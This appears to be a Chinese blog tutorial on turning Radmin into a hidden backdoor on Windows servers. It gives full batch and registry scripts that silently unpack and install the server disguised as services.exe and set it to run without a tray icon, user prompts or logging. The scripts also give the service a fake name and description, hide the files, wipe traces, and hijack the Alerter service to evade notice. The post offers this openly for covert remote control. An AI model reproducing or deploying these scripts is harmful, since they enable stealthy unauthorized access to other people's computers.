問一些高手,都說用的radmin,一個很重要的原因就是它不被殺毒軟件查殺,而且速度非常快,界面也是簡潔美觀,可以說是高手的最愛,(什麼?沒聽說過?那就不用看了!)就是缺少一個反向連接的功能,但是對於我們控制服務器來說,反向連接也是多餘的,今天我給大家帶來一個radmin的智能化一鍵安裝成新的服務或者替換成系統已有的服務,這樣做的好處當然是誰都知道--進程不會被簡單地kill掉,而且不用擔心開機自啟動的問題。好,廢話不多說,現在就來開工。
首先配置服務端,很簡單的幾個設置,這裡我用的是影子漢化版3.2,隱藏任務欄圖標是肯定的了,改端口為2046(這個電影我至今看不懂,所以就用它了),如圖一






好了,這樣就生成了r_server這個服務端,雙擊執行這裡是沒有效果的,不信你可以試試,我們需要在命令行下把它安裝成服務,但是它默認的服務名稱和顯示名稱分別是r_server和remote administrator service並且沒有服務的描述,雙擊服務會看到進程所在的路徑,如圖二,三











同時在任務管理器下radmin的進程r_server會顯得很刺眼。
思路是這樣的,用rar的自解壓包將radmin的相關文件解壓到系統目錄,然後用批處理將radmin安裝成服務,並且改名,最後刪掉痕跡,是不是很爽啊!
Radmin的服務安裝在註冊表中有2個地方,分別在[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]和[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server]






再如圖四把radmin改名為一個系統進程名,我這裡用的是services,因為服務名將來也要顯示在進程中的,所以起個和系統進程名一樣的名字,只是真正的services在system32目錄下,我換個目錄,在system32\WBEM\。radmin運行需要raddrv.dll和admdll.dll這兩個動態鏈接庫的支持,sc用來改服務描述名,2.bat 就是批處理了。我們將這五個文件做成一個自解壓包,並讓它自解壓到%systemroot%\system32\WBEM目錄下,%systemroot%顧名思義是系統目錄,用來適應不同的操作系統,然後在高級自解壓選項裡的常規選項卡的解壓後運行中填上主角批處理文件,如圖五






在模式選項卡的安靜模式選全部隱藏,覆蓋方式選擇覆蓋所有文件,如圖六






圖標可以自己改一個,我就不說了。
再來說批處理,在radmin的配置界面安裝服務,然後將[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]主鍵導出,接著把它用批處理命令寫入server.reg這個自己建立的註冊表文件中,注意關閉回顯。這之前先把services註冊成服務,注意選擇安靜模式,這樣註冊的問題在於沒有了[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]主鍵的配置信息,所以我們才要後來補上。
@echo off
@services.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>> c:\server.reg
echo "Port"=hex:fe,07,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg
echo "NTAuthId"=hex:02,00,00,00>> c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo "Parameter"=hex:0d,6f,92,ce,c2,9c,9f,0a,fb,6a,6a,54,65,15,3e,53>> c:\server.reg>>
@regedit /s c:\server.reg

寫完後用@regedit /s c:\server.reg 這個語句安靜地將我們寫好的註冊表文件導入
@net start r_server
@attrib +r +h +s %systemroot%\system32\WBEM\services.exe
@attrib +r +h +s %systemroot%\system32\WBEM\Admdll.dll
@attrib +r +h +s %systemroot%\system32\WBEM\raddrv.dll

接著啟動r_server服務,因為默認安裝的服務名是r_server,啟動之後才能改它的顯示名稱。還做了一個工作就是加了只讀,系統和隱藏屬性,這步工作你可以做,也可以不做。
下面來改註冊表的描述名稱:
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >> c:\ip.reg
echo "Description"="動態數據交換的網絡傳輸的管理服務。">> c:\ip.reg
@regedit /s c:\ip.reg

是不是很具有誘惑力?
接著是改顯示名稱和一些掃尾工作

@del c:\ip.reg /f /q
@del c:\server.reg /f /q
@sc config r_server displayname= "Network DDE Management"
@del %systemroot%\system32\WBEM\sc.exe /f /q
@del %systemroot%\system32\WBEM\2.bat /f /q

顯示名稱要用到sc,用寫註冊表的方法是行不通的,我試過了,注意sc的用法,不會地可以查資料。我起的顯示名稱是不是同樣具有誘惑力?哈哈!奸笑中……
試著運行一下那個可愛的自解壓文件(因為換了圖標,所以很像普通的可執行文件),會蹦出cmd窗口運行一會兒,不小心看一下就過去了,當然這也是有待改進的地方,本人材疏學淺,哪位高人如果能作出了不閃的效果不要忘了跟我說一聲哦!調出任務管理器,可以看到有2個services,結束試試?都是關鍵進程,哈哈,目的達到了。你不是一直都想要做一個不容易被結束的進程嗎?服務是一個很好的選擇哦!
這裡只是做了一個示範,大家看懂了之後可以盡你的想像力自由發揮,做一個說不定連我都會被忽悠過去的服務哦!
接著再來做替換服務,以Alerter為例吧,Alerter服務提供系統管理級警報的服務,不開也沒什麼太大影響,而且默認是自啟動的哦!實際上我們將安裝好後的radmin服務的配置替換alter的配置就可以了,這是我試驗後得出的結論。接著上面的,把[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server]鍵值導出,這裡取名叫alerter.reg,那麼我們的批處理就是這麼寫了:
@echo off
echo Windows Registry Editor Version 5.00 > c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>> c:\server.reg
echo "Port"=hex:fe,07,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg
echo "NTAuthId"=hex:02,00,00,00>> c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo "Parameter"=hex:0d,6f,92,ce,c2,9c,9f,0a,fb,6a,6a,54,65,15,3e,53>> c:\server.reg
@regedit /s c:\server.reg
@regedit /s %systemroot%\system32\WBEM\alerter.reg
@attrib +r +h +s %systemroot%\system32\WBEM\services.exe
@attrib +r +h +s %systemroot%\system32\WBEM\Admdll.dll
@attrib +r +h +s %systemroot%\system32\WBEM\raddrv.dll
@del c:\server.reg /f /q
@del %systemroot%\system32\WBEM\alerter.reg /f /q
@del %systemroot%\system32\WBEM\3.bat /f /q
我就不麻煩將這兩個註冊表文件用寫入的方法導入了,效果是一樣的。記得在做自解壓的時候把alerter.reg包進去,其餘還是一樣。這種方法效果同樣是一閃而過了,不過速度更快些,更不容易被發覺(因為之前的那個需要啟動radmin服務)。再看看服務項裡,Alerter還是那個Alerter,可是運行的程序可就不是services.exe了,這一招偷梁換柱不細看還真是不容易被發現哦!注意替換之後重啟才會生效,如果你嫌麻煩可以加一個net start,但是這樣會使cmd窗口停止的時間更長,為了長久之計,忍一時無所謂拉!
其實本文只是一個拋磚,實際上利用好了是很靈活的哦!同時運用在編程上也是很好的一種思路,就等著各位看客的玉出來了!
好了,替換服務就是這麼簡單了,你還等什麼?趕快行動啊!
註:本測試在2000server上通過。


    全站熱搜

    Neo Chao 發表在 痞客邦 留言(0) 人氣()